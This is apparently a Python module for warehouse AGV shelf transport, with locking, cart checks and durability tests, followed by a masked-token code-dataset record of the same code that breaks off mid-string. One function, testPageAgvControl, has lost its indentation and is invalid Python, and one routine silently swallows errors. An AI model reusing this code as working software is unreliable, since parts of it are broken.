        c = api.mission(agvId,2) #lift mission; also returns the shelf id for verification
        if c:
            checkCart(cartId,c)
        api.move(agvId,srcLoc+".2")
    except Exception as e:
        #TODO:ycat api.move(agvId,srcLoc+".2")
        #TODO:ycat raise e
        pass   # NOTE(review): failures here are deliberately swallowed (see TODOs)
    finally:
        unlockStockA(agvId,srcLoc)
    loc,type = api.getMissionType("get","",srcLoc)
    api.mission(agvId,type) #mission 3: AGV+shelf follow to the right; 4: to the left
    loc,type = api.getMissionType("put",srcLoc,locId)
    api.move(agvId,loc+".3")
    api.mission(agvId,type) #mission 3: AGV+shelf follow to the right; 4: to the left
    lockStockA(agvId,locId)
    try:
        api.move(agvId,locId+".4")
        api.mission(agvId,5) #set the shelf down
        api.move(agvId,locId+".5") #head back
    finally:
        unlockStockA(agvId,locId)
        freeAgv(agvId)
#Transport WITH a shelf on board.
def moveCart(agvId,cartId,srcLoc,locId,finishCallback,obj):
    """Asynchronously move shelf *cartId* from *srcLoc* to *locId* using *agvId*.

    finishCallback(obj) fires when done; obj carries agv/result/resultDesc.
    On submission failure the AGV is reset and released before re-raising.
    """
    _initObj(obj,agvId)
    assert api.isCartLoc(cartId)
    #the AGV must already be in the locked state before moving a shelf
    #assert api.isLocked(agvId)
    srcLoc = getOriginPoint(srcLoc)
    locId = getOriginPoint(locId)
    try:
        _run(func=_moveCart,args=(agvId,srcLoc,locId,cartId),callback=finishCallback,obj=obj)
    except Exception as e:
        restAgv(agvId)
        freeAgv(agvId)
        raise e
#Transport WITHOUT a shelf: plain point-to-point move (async).
def move(agvId,locId,finishCallback,obj):
    """Asynchronously move *agvId* to *locId*; finishCallback(obj) on completion."""
    _initObj(obj,agvId)
    #the AGV must already be in the locked state before moving
    #assert api.isLocked(agvId)
    try:
        locId=getOriginPoint(locId)
        _run(func=api.move,args=(agvId,locId),callback=finishCallback,obj=obj)
    except Exception as e:
        freeAgv(agvId)
        raise e
#Release our claim on the AGV.
def freeAgv(agvId):
    """Unlock *agvId*; failures are logged, never raised (best-effort)."""
    try:
        api.unlock(agvId)
    except Exception as err:
        log.exception("freeAgv", err)
#Send the AGV back to the turntable.
def restAgv(agvId):
    """Reset *agvId* (resolved to its driver-level id) so it returns home."""
    api.reset(api.getAgvId(agvId))
def Init():
    # Hook AGV location events into the dashboard reporter.  The import is
    # local, presumably to avoid a circular dependency at module load —
    # TODO confirm.
    import interface.dashboard.dashboardApi
    locationEvent.connect(interface.dashboard.dashboardApi.reportAgvLoc)
    time.sleep(3)
################# unit test #################
def testgetPoint():
    """point.cfg must map both 'begin' aliases."""
    assert getPoint("StockA_row7_col4") == "begin_1"
    assert getPoint("StockA_row8_col4") == "begin_2"
def testgetOrginPoint():
    """Reverse mapping returns origins; unknown names pass through."""
    assert getOriginPoint("begin_1") == "StockA_row7_col4"
    assert getOriginPoint("begin_2") == "StockA_row8_col4"
    assert getOriginPoint("hhahahaa") == "hhahahaa"
def testgetStockA():
    """Aisle index: paired rows share one index; non-stockA names give None."""
    cases = {
        "stockA_row10_col3": 9003,
        "stockA_row10_col4": 9004,
        "stockA_row1_col1": 1001,
        "stockA_row2_col2": 1002,
        "stockA_row3_col2": 3002,
        "stockA_row4_col2": 3002,
        "stockA_row4_col2.1": 3002,
        "stockB_row4_col2.1": None,
        "begin_1": None,
        "seat_1": None,
    }
    for loc, want in cases.items():
        assert getStockA(loc) == want
def testcheckCart():
    """checkCart learns unknown carts, accepts matching re-scans, and raises
    (naming the offending cart) on a mismatched shelf id."""
    global g_carts
    g_carts = None   # force a fresh load from cart.cfg
    checkCart("CART9001","591")
    checkCart("CART9002","592")
    gg = json_codec.load_file("cart.cfg")
    assert "CART9001" in gg
    assert "CART9002" in gg
    assert gg["CART9001"] == "591"
    assert gg["CART9002"] == "592"
    checkCart("CART9002","592")
    checkCart("CART9001","591")
    try:
        checkCart("CART9002","591")   # 591 belongs to CART9001 -> must raise
        assert 0
    except Exception as e:
        s = str(e)
        assert s.find("货架ID不正确,期望货架:CART9002, 实际货架:CART9001") != -1
import counter
@counter.count
def move_cart(cartId,srcLoc,destLoc,agvId=None):
    """Synchronously move shelf *cartId* from *srcLoc* to *destLoc*.

    Applies for an AGV when none is supplied, then chains the two async
    stages (call -> moveCart) through callbacks and busy-waits until
    obj["finish"] is set.  Exits the whole process if either stage fails.
    """
    print(cartId,srcLoc,destLoc)
    counter.setPrint(True)
    def callback1(obj):
        # Stage 1 done: AGV is under the shelf — start the carry.
        if obj["result"] == -1:
            print("error, system exit")
            obj["finish"] = True
            sys.exit(-1)
        else:
            log.warning(obj["agv"],"start move from",obj["loc1"],"to",obj["loc2"])
            moveCart(obj["agv"],obj["cart"],obj["loc1"],obj["loc2"],callback2,obj)
    def callback2(obj):
        # Stage 2 done: shelf delivered (or the carry failed).
        if obj["result"] == -1:
            print("error, system exit")
            obj["finish"] = True
            sys.exit(-1)
        else:
            log.warning(obj["agv"],"arrived",obj["loc2"])
            obj["finish"] = True
    obj = {}
    obj["loc1"] = srcLoc
    obj["loc2"] = destLoc
    obj["cart"] = cartId
    print("call ",srcLoc)
    if agvId is None:
        agvId = apply(srcLoc)
    call(agvId,srcLoc,callback1,obj)
    while not utility.is_exited():
        if "finish" in obj:
            break
        time.sleep(0.2)   # poll until a callback marks completion
    print("------ move ",srcLoc," to ",destLoc," finish ------")
#def func1(start,stock1,stock2):
# print("-------------------- start thread ------------------------")
# time.sleep(1)
# cartId = "CART9009"
# move_cart(cartId,start,stock1)
# next = stock1
# for s in seats:
# move_cart(cartId,next,"seat"+str(s)+"_1")
# if next == stock1:
# next = stock2
# else:
# next = stock1
# move_cart(cartId,"seat"+str(s)+"_1",next)
# # move_cart(cartId, s, next)
# print("=======================================")
# print("finish func1")
# print("=======================================")
def func2(stock1,stock2):
    """Durability worker: shuttle CART9009 between *stock1* and *stock2* 20 times."""
    print("-------------------- start thread ------------------------",stock1,stock2)
    time.sleep(1)
    shelf = "CART9009"
    for round_no in range(20):
        print("current loop is - ", str(round_no))
        move_cart(shelf, stock1, stock2)
        move_cart(shelf, stock2, stock1)
        print("current loop end - ", str(round_no))
    print("=======================================")
    print("finish func2")
    print("=======================================")
def func3(times,starts,seats):
    """Durability loop: starting from *starts*, visit each seat in *seats*
    in sequence, carrying shelf CART9009, repeating the circuit.

    NOTE(review): range(0, times-1) performs times-1 iterations — likely an
    off-by-one if *times* full circuits were intended; confirm before changing.
    """
    current=starts
    cartId = "CART9009"
    time.sleep(1)
    for loop in range(0,times-1):
        # current=starts
        tip1="currentLoop is "+loop.__str__()+" currentStart is "+current
        print(tip1)
        for i in range(0,len(seats)):
            next = str(seats[i])   # NOTE: shadows the builtin next()
            tip2= "currentLoop is "+loop.__str__()+"currentOrigin is "+ current + "currentNext is " + next +" seatIndex is "+i.__str__()
            print(tip2)
            print("excuting")
            move_cart(cartId,current,next)
            current = next   # next circuit leg departs from where we stopped
def testPageAgvControl(jsonstr):
jsonData = json.loads(jsonstr)
result = False
if len(jsonData)==0:
result=False
else:
for currentJson in jsonData:
start = currentJson["start"]
seat = currentJson["seat"]
loop=int(currentJson["loop"])
seats = str.split(seat, ',')
durabilityTestTask1 = threading.Thread(target=func3, args=[loop, start, seats])
durabilityTestTask1.start()
result=True
return result
def testtestPageAgvControl(jsonstr):
    """Dry-run of testPageAgvControl: print the parsed tasks (with pauses so
    a human can follow) instead of launching AGV threads.

    Returns True unless the task list is empty.
    """
    jsonData = json.loads(jsonstr)
    result = False
    if len(jsonData) == 0:
        result = False
    else:
        for currentJson in jsonData:
            start = currentJson["start"]
            print(start)
            time.sleep(3)
            seat = currentJson["seat"]
            seats = str.split(seat, ',')
            print(seat)
            time.sleep(3)
            for currentseat in seats:
                print(currentseat)
                time.sleep(3)
            time.sleep(10)
            result = True
    return result
def testPageUnloockAll():
    """Release every AGV lock via the driver (maintenance helper)."""
    api.unlockAll()
def testProcess(jsonData):
    # Run a task JSON through the full lifecycle: start the framework,
    # launch the durability threads, then tear everything down.
    utility.start()
    testPageAgvControl(jsonData)
    utility.finish()
def test1():
    """Durability scenario: four predefined shuttle routes.  Only task 1 is
    actually started; tasks 2-4 are created but left disabled (commented)."""
    Init()
    durabilityTestTask1= threading.Thread(target=func3,args=[20,"stockA_row1_col3",["stockA_row1_col2","stockA_row1_col4"]])
    durabilityTestTask1.start()
    durabilityTestTask2= threading.Thread(target=func3,args=[20,"stockA_row1_col2",["seat2_1","stockA_row4_col2"]])
    # durabilityTestTask2.start()
    durabilityTestTask3= threading.Thread(target=func3,args=[20,"stockA_row5_col3",["seat16_1","stockA_row5_col2"]])
    # durabilityTestTask3.start()
    durabilityTestTask4= threading.Thread(target=func3,args=[20,"stockA_row6_col3",["seat12_1","stockA_row6_col2"]])
    # durabilityTestTask4.start()
    durabilityTestTask1.join()
    #t1.join()
    print("===============ALL FINISH ========================")
if __name__ == '__main__':
    # Dispatch on command-line flags: "process" replays args.txt through the
    # page controller, "unlock" releases all locks, "test" runs the durability
    # scenario, anything else runs the point-mapping self-check.
    # utility.run_tests()
    if sys.argv is not None and len(sys.argv) > 0:
        if "process" in sys.argv:
            log.info("run at testPage mode")
            with open('/agvscada/driver/args.txt', 'r', encoding='utf-8') as f:
                args = f.read()
            api.init()
            time.sleep(3)
            testPageAgvControl(args)
        elif "unlock" in sys.argv:
            testPageUnloockAll()
        elif "test" in sys.argv:
            utility.start()
            test1()
            utility.finish()
        else:
            utility.start()
            testgetPoint()
            utility.finish()
# test3()
|
flexible
|
{
"blob_id": "e2feb12b88babbbfa4cc8447c91e8a5b6c30f78b",
"index": 1466,
"step-1": "<mask token>\n\n\[email protected]()\ndef init():\n if utility.is_test():\n return\n api.init()\n time.sleep(3)\n\n\ndef wait():\n global g_threads\n for t in g_threads:\n t.join()\n g_threads.clear()\n\n\[email protected]()\ndef fini():\n if utility.is_test():\n return\n api.fini()\n wait()\n\n\n<mask token>\n\n\ndef getStockA(loc):\n if loc[0:6] != 'stockA':\n return None\n m = re.search('stockA_row(\\\\d+)_col(\\\\d+).*', loc)\n if m is None:\n return None\n row = int(m.group(1))\n col = int(m.group(2))\n if row is None:\n return\n if row % 2 != 1:\n row -= 1\n return row * 1000 + col\n\n\[email protected](g_lock)\ndef checkTimeout(index, agvId, loc):\n global g_stockLock\n if index in g_stockLock:\n if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:\n unlockStockA(agvId, loc)\n log.warning('delete timeout locked', index)\n\n\ndef lockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index is None:\n return\n if index in g_stockLock:\n checkTimeout(index, agvId, loc)\n log.warning(agvId, loc, 'is locked, wait for unlock')\n for i in range(60 * 5):\n if index not in g_stockLock:\n break\n time.sleep(1)\n log.info(agvId, loc, 'wait for unlock success')\n global g_lock\n log.debug(agvId, 'lock', loc, index)\n g_lock.acquire()\n g_stockLock[index] = utility.ticks()\n g_lock.release()\n\n\[email protected](g_lock)\ndef unlockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index in g_stockLock:\n log.debug(agvId, 'unlock', loc, index)\n del g_stockLock[index]\n\n\[email protected](g_lock)\ndef getPoint(originPoint):\n global g_point\n loadPoint()\n if g_point[originPoint] is not None:\n return g_point[originPoint]\n return originPoint\n\n\[email protected](g_lock)\ndef getOriginPoint(point):\n global g_point\n loadPoint()\n for itemIndex in g_point:\n if g_point[itemIndex] == point:\n return itemIndex\n return point\n\n\[email protected](g_lock)\ndef loadPoint():\n global g_point\n filePath = 
os.path.dirname(__file__)\n fileName = 'point.cfg'\n if filePath:\n fileName = filePath + '/' + fileName\n g_point = json_codec.load_file(fileName)\n\n\[email protected](g_lock)\ndef checkCart(cartId, scanId):\n scanId = scanId.strip()\n\n def loadCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n g_carts = json_codec.load_file(pp)\n\n def saveCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n json_codec.dump_file(pp, g_carts)\n\n def findCart(scanId):\n global g_carts\n for c in g_carts:\n if g_carts[c] == scanId:\n return c\n return 'unknown'\n global g_carts\n if g_carts is None:\n loadCart()\n if cartId in g_carts:\n if scanId != g_carts[cartId]:\n log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))\n raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart\n (scanId))\n else:\n g_carts[cartId] = scanId\n saveCart()\n\n\ndef _run(func, args, callback, obj):\n\n def threadFunc(func, args, callback, obj):\n hasCallback = False\n try:\n func(*args)\n if utility.is_exited():\n return\n hasCallback = True\n callback(obj)\n except Exception as e:\n obj['result'] = -1\n obj['resultDesc'] = str(e)\n log.exception('agvCtrl:', e)\n if 'agv' in obj:\n agvId = obj['agv']\n log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')\n restAgv(agvId)\n freeAgv(agvId)\n if not hasCallback:\n callback(obj)\n t = threading.Thread(target=threadFunc, args=(func, args, callback, obj))\n global g_threads\n t.start()\n g_threads.append(t)\n\n\ndef _initObj(obj, agvId):\n obj['agv'] = agvId\n obj['result'] = 0\n obj['resultDesc'] = 'success'\n\n\n<mask token>\n\n\ndef apply(locId):\n locId = getOriginPoint(locId)\n return api.apply(locId + '.1')\n\n\ndef call(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n locId = getOriginPoint(locId)\n try:\n _run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)\n except Exception as e:\n 
restAgv(agvId)\n freeAgv(agvId)\n raise e\n return agvId\n\n\n<mask token>\n\n\ndef moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):\n _initObj(obj, agvId)\n assert api.isCartLoc(cartId)\n srcLoc = getOriginPoint(srcLoc)\n locId = getOriginPoint(locId)\n try:\n _run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=\n finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n\n\n<mask token>\n\n\ndef freeAgv(agvId):\n try:\n api.unlock(agvId)\n except Exception as e:\n log.exception('freeAgv', e)\n\n\ndef restAgv(agvId):\n agvId2 = api.getAgvId(agvId)\n api.reset(agvId2)\n\n\n<mask token>\n\n\ndef testgetPoint():\n resulta = getPoint('StockA_row7_col4')\n assert resulta == 'begin_1'\n resultb = getPoint('StockA_row8_col4')\n assert resultb == 'begin_2'\n\n\ndef testgetOrginPoint():\n resulta = getOriginPoint('begin_1')\n assert resulta == 'StockA_row7_col4'\n resultb = getOriginPoint('begin_2')\n assert resultb == 'StockA_row8_col4'\n resultc = getOriginPoint('hhahahaa')\n assert resultc == 'hhahahaa'\n\n\n<mask token>\n\n\ndef testcheckCart():\n global g_carts\n g_carts = None\n checkCart('CART9001', '591')\n checkCart('CART9002', '592')\n gg = json_codec.load_file('cart.cfg')\n assert 'CART9001' in gg\n assert 'CART9002' in gg\n assert gg['CART9001'] == '591'\n assert gg['CART9002'] == '592'\n checkCart('CART9002', '592')\n checkCart('CART9001', '591')\n try:\n checkCart('CART9002', '591')\n assert 0\n except Exception as e:\n s = str(e)\n assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1\n\n\n<mask token>\n\n\ndef func2(stock1, stock2):\n print('-------------------- start thread ------------------------',\n stock1, stock2)\n time.sleep(1)\n cartId = 'CART9009'\n for i in range(20):\n print('current loop is - ', i.__str__())\n move_cart(cartId, stock1, stock2)\n move_cart(cartId, stock2, stock1)\n print('current loop end - ', i.__str__())\n print('=======================================')\n 
print('finish func2')\n print('=======================================')\n\n\ndef func3(times, starts, seats):\n current = starts\n cartId = 'CART9009'\n time.sleep(1)\n for loop in range(0, times - 1):\n tip1 = 'currentLoop is ' + loop.__str__(\n ) + ' currentStart is ' + current\n print(tip1)\n for i in range(0, len(seats)):\n next = str(seats[i])\n tip2 = ('currentLoop is ' + loop.__str__() +\n 'currentOrigin is ' + current + 'currentNext is ' + next +\n ' seatIndex is ' + i.__str__())\n print(tip2)\n print('excuting')\n move_cart(cartId, current, next)\n current = next\n\n\ndef testPageAgvControl(jsonstr):\n jsonData = json.loads(jsonstr)\n result = False\n if len(jsonData) == 0:\n result = False\n else:\n for currentJson in jsonData:\n start = currentJson['start']\n seat = currentJson['seat']\n loop = int(currentJson['loop'])\n seats = str.split(seat, ',')\n durabilityTestTask1 = threading.Thread(target=func3, args=[loop,\n start, seats])\n durabilityTestTask1.start()\n result = True\n return result\n\n\n<mask token>\n\n\ndef testPageUnloockAll():\n api.unlockAll()\n\n\n<mask token>\n\n\ndef test1():\n Init()\n durabilityTestTask1 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])\n durabilityTestTask1.start()\n durabilityTestTask2 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])\n durabilityTestTask3 = threading.Thread(target=func3, args=[20,\n 'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])\n durabilityTestTask4 = threading.Thread(target=func3, args=[20,\n 'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])\n durabilityTestTask1.join()\n print('===============ALL FINISH ========================')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]()\ndef init():\n if utility.is_test():\n return\n api.init()\n time.sleep(3)\n\n\ndef wait():\n global g_threads\n for t in g_threads:\n t.join()\n g_threads.clear()\n\n\[email protected]()\ndef fini():\n if utility.is_test():\n return\n api.fini()\n wait()\n\n\n<mask token>\n\n\ndef getStockA(loc):\n if loc[0:6] != 'stockA':\n return None\n m = re.search('stockA_row(\\\\d+)_col(\\\\d+).*', loc)\n if m is None:\n return None\n row = int(m.group(1))\n col = int(m.group(2))\n if row is None:\n return\n if row % 2 != 1:\n row -= 1\n return row * 1000 + col\n\n\[email protected](g_lock)\ndef checkTimeout(index, agvId, loc):\n global g_stockLock\n if index in g_stockLock:\n if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:\n unlockStockA(agvId, loc)\n log.warning('delete timeout locked', index)\n\n\ndef lockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index is None:\n return\n if index in g_stockLock:\n checkTimeout(index, agvId, loc)\n log.warning(agvId, loc, 'is locked, wait for unlock')\n for i in range(60 * 5):\n if index not in g_stockLock:\n break\n time.sleep(1)\n log.info(agvId, loc, 'wait for unlock success')\n global g_lock\n log.debug(agvId, 'lock', loc, index)\n g_lock.acquire()\n g_stockLock[index] = utility.ticks()\n g_lock.release()\n\n\[email protected](g_lock)\ndef unlockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index in g_stockLock:\n log.debug(agvId, 'unlock', loc, index)\n del g_stockLock[index]\n\n\[email protected](g_lock)\ndef getPoint(originPoint):\n global g_point\n loadPoint()\n if g_point[originPoint] is not None:\n return g_point[originPoint]\n return originPoint\n\n\[email protected](g_lock)\ndef getOriginPoint(point):\n global g_point\n loadPoint()\n for itemIndex in g_point:\n if g_point[itemIndex] == point:\n return itemIndex\n return point\n\n\[email protected](g_lock)\ndef loadPoint():\n global g_point\n filePath = 
os.path.dirname(__file__)\n fileName = 'point.cfg'\n if filePath:\n fileName = filePath + '/' + fileName\n g_point = json_codec.load_file(fileName)\n\n\[email protected](g_lock)\ndef checkCart(cartId, scanId):\n scanId = scanId.strip()\n\n def loadCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n g_carts = json_codec.load_file(pp)\n\n def saveCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n json_codec.dump_file(pp, g_carts)\n\n def findCart(scanId):\n global g_carts\n for c in g_carts:\n if g_carts[c] == scanId:\n return c\n return 'unknown'\n global g_carts\n if g_carts is None:\n loadCart()\n if cartId in g_carts:\n if scanId != g_carts[cartId]:\n log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))\n raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart\n (scanId))\n else:\n g_carts[cartId] = scanId\n saveCart()\n\n\ndef _run(func, args, callback, obj):\n\n def threadFunc(func, args, callback, obj):\n hasCallback = False\n try:\n func(*args)\n if utility.is_exited():\n return\n hasCallback = True\n callback(obj)\n except Exception as e:\n obj['result'] = -1\n obj['resultDesc'] = str(e)\n log.exception('agvCtrl:', e)\n if 'agv' in obj:\n agvId = obj['agv']\n log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')\n restAgv(agvId)\n freeAgv(agvId)\n if not hasCallback:\n callback(obj)\n t = threading.Thread(target=threadFunc, args=(func, args, callback, obj))\n global g_threads\n t.start()\n g_threads.append(t)\n\n\ndef _initObj(obj, agvId):\n obj['agv'] = agvId\n obj['result'] = 0\n obj['resultDesc'] = 'success'\n\n\n<mask token>\n\n\ndef apply(locId):\n locId = getOriginPoint(locId)\n return api.apply(locId + '.1')\n\n\ndef call(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n locId = getOriginPoint(locId)\n try:\n _run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)\n except Exception as e:\n 
restAgv(agvId)\n freeAgv(agvId)\n raise e\n return agvId\n\n\ndef _moveCart(agvId, srcLoc, locId, cartId):\n try:\n c = api.mission(agvId, 2)\n if c:\n checkCart(cartId, c)\n api.move(agvId, srcLoc + '.2')\n except Exception as e:\n pass\n finally:\n unlockStockA(agvId, srcLoc)\n loc, type = api.getMissionType('get', '', srcLoc)\n api.mission(agvId, type)\n loc, type = api.getMissionType('put', srcLoc, locId)\n api.move(agvId, loc + '.3')\n api.mission(agvId, type)\n lockStockA(agvId, locId)\n try:\n api.move(agvId, locId + '.4')\n api.mission(agvId, 5)\n api.move(agvId, locId + '.5')\n finally:\n unlockStockA(agvId, locId)\n freeAgv(agvId)\n\n\ndef moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):\n _initObj(obj, agvId)\n assert api.isCartLoc(cartId)\n srcLoc = getOriginPoint(srcLoc)\n locId = getOriginPoint(locId)\n try:\n _run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=\n finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n\n\ndef move(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n try:\n locId = getOriginPoint(locId)\n _run(func=api.move, args=(agvId, locId), callback=finishCallback,\n obj=obj)\n except Exception as e:\n freeAgv(agvId)\n raise e\n\n\ndef freeAgv(agvId):\n try:\n api.unlock(agvId)\n except Exception as e:\n log.exception('freeAgv', e)\n\n\ndef restAgv(agvId):\n agvId2 = api.getAgvId(agvId)\n api.reset(agvId2)\n\n\n<mask token>\n\n\ndef testgetPoint():\n resulta = getPoint('StockA_row7_col4')\n assert resulta == 'begin_1'\n resultb = getPoint('StockA_row8_col4')\n assert resultb == 'begin_2'\n\n\ndef testgetOrginPoint():\n resulta = getOriginPoint('begin_1')\n assert resulta == 'StockA_row7_col4'\n resultb = getOriginPoint('begin_2')\n assert resultb == 'StockA_row8_col4'\n resultc = getOriginPoint('hhahahaa')\n assert resultc == 'hhahahaa'\n\n\ndef testgetStockA():\n assert getStockA('stockA_row10_col3') == 9003\n assert getStockA('stockA_row10_col4') == 
9004\n assert getStockA('stockA_row1_col1') == 1001\n assert getStockA('stockA_row2_col2') == 1002\n assert getStockA('stockA_row3_col2') == 3002\n assert getStockA('stockA_row4_col2') == 3002\n assert getStockA('stockA_row4_col2.1') == 3002\n assert getStockA('stockB_row4_col2.1') == None\n assert getStockA('begin_1') == None\n assert getStockA('seat_1') == None\n\n\ndef testcheckCart():\n global g_carts\n g_carts = None\n checkCart('CART9001', '591')\n checkCart('CART9002', '592')\n gg = json_codec.load_file('cart.cfg')\n assert 'CART9001' in gg\n assert 'CART9002' in gg\n assert gg['CART9001'] == '591'\n assert gg['CART9002'] == '592'\n checkCart('CART9002', '592')\n checkCart('CART9001', '591')\n try:\n checkCart('CART9002', '591')\n assert 0\n except Exception as e:\n s = str(e)\n assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1\n\n\n<mask token>\n\n\ndef func2(stock1, stock2):\n print('-------------------- start thread ------------------------',\n stock1, stock2)\n time.sleep(1)\n cartId = 'CART9009'\n for i in range(20):\n print('current loop is - ', i.__str__())\n move_cart(cartId, stock1, stock2)\n move_cart(cartId, stock2, stock1)\n print('current loop end - ', i.__str__())\n print('=======================================')\n print('finish func2')\n print('=======================================')\n\n\ndef func3(times, starts, seats):\n current = starts\n cartId = 'CART9009'\n time.sleep(1)\n for loop in range(0, times - 1):\n tip1 = 'currentLoop is ' + loop.__str__(\n ) + ' currentStart is ' + current\n print(tip1)\n for i in range(0, len(seats)):\n next = str(seats[i])\n tip2 = ('currentLoop is ' + loop.__str__() +\n 'currentOrigin is ' + current + 'currentNext is ' + next +\n ' seatIndex is ' + i.__str__())\n print(tip2)\n print('excuting')\n move_cart(cartId, current, next)\n current = next\n\n\ndef testPageAgvControl(jsonstr):\n jsonData = json.loads(jsonstr)\n result = False\n if len(jsonData) == 0:\n result = False\n else:\n for 
currentJson in jsonData:\n start = currentJson['start']\n seat = currentJson['seat']\n loop = int(currentJson['loop'])\n seats = str.split(seat, ',')\n durabilityTestTask1 = threading.Thread(target=func3, args=[loop,\n start, seats])\n durabilityTestTask1.start()\n result = True\n return result\n\n\n<mask token>\n\n\ndef testPageUnloockAll():\n api.unlockAll()\n\n\n<mask token>\n\n\ndef test1():\n Init()\n durabilityTestTask1 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])\n durabilityTestTask1.start()\n durabilityTestTask2 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])\n durabilityTestTask3 = threading.Thread(target=func3, args=[20,\n 'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])\n durabilityTestTask4 = threading.Thread(target=func3, args=[20,\n 'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])\n durabilityTestTask1.join()\n print('===============ALL FINISH ========================')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\[email protected]()\ndef init():\n if utility.is_test():\n return\n api.init()\n time.sleep(3)\n\n\ndef wait():\n global g_threads\n for t in g_threads:\n t.join()\n g_threads.clear()\n\n\[email protected]()\ndef fini():\n if utility.is_test():\n return\n api.fini()\n wait()\n\n\n<mask token>\n\n\ndef getStockA(loc):\n if loc[0:6] != 'stockA':\n return None\n m = re.search('stockA_row(\\\\d+)_col(\\\\d+).*', loc)\n if m is None:\n return None\n row = int(m.group(1))\n col = int(m.group(2))\n if row is None:\n return\n if row % 2 != 1:\n row -= 1\n return row * 1000 + col\n\n\[email protected](g_lock)\ndef checkTimeout(index, agvId, loc):\n global g_stockLock\n if index in g_stockLock:\n if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:\n unlockStockA(agvId, loc)\n log.warning('delete timeout locked', index)\n\n\ndef lockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index is None:\n return\n if index in g_stockLock:\n checkTimeout(index, agvId, loc)\n log.warning(agvId, loc, 'is locked, wait for unlock')\n for i in range(60 * 5):\n if index not in g_stockLock:\n break\n time.sleep(1)\n log.info(agvId, loc, 'wait for unlock success')\n global g_lock\n log.debug(agvId, 'lock', loc, index)\n g_lock.acquire()\n g_stockLock[index] = utility.ticks()\n g_lock.release()\n\n\[email protected](g_lock)\ndef unlockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index in g_stockLock:\n log.debug(agvId, 'unlock', loc, index)\n del g_stockLock[index]\n\n\[email protected](g_lock)\ndef getPoint(originPoint):\n global g_point\n loadPoint()\n if g_point[originPoint] is not None:\n return g_point[originPoint]\n return originPoint\n\n\[email protected](g_lock)\ndef getOriginPoint(point):\n global g_point\n loadPoint()\n for itemIndex in g_point:\n if g_point[itemIndex] == point:\n return itemIndex\n return point\n\n\[email protected](g_lock)\ndef loadPoint():\n global g_point\n filePath = 
os.path.dirname(__file__)\n fileName = 'point.cfg'\n if filePath:\n fileName = filePath + '/' + fileName\n g_point = json_codec.load_file(fileName)\n\n\[email protected](g_lock)\ndef checkCart(cartId, scanId):\n scanId = scanId.strip()\n\n def loadCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n g_carts = json_codec.load_file(pp)\n\n def saveCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n json_codec.dump_file(pp, g_carts)\n\n def findCart(scanId):\n global g_carts\n for c in g_carts:\n if g_carts[c] == scanId:\n return c\n return 'unknown'\n global g_carts\n if g_carts is None:\n loadCart()\n if cartId in g_carts:\n if scanId != g_carts[cartId]:\n log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))\n raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart\n (scanId))\n else:\n g_carts[cartId] = scanId\n saveCart()\n\n\ndef _run(func, args, callback, obj):\n\n def threadFunc(func, args, callback, obj):\n hasCallback = False\n try:\n func(*args)\n if utility.is_exited():\n return\n hasCallback = True\n callback(obj)\n except Exception as e:\n obj['result'] = -1\n obj['resultDesc'] = str(e)\n log.exception('agvCtrl:', e)\n if 'agv' in obj:\n agvId = obj['agv']\n log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')\n restAgv(agvId)\n freeAgv(agvId)\n if not hasCallback:\n callback(obj)\n t = threading.Thread(target=threadFunc, args=(func, args, 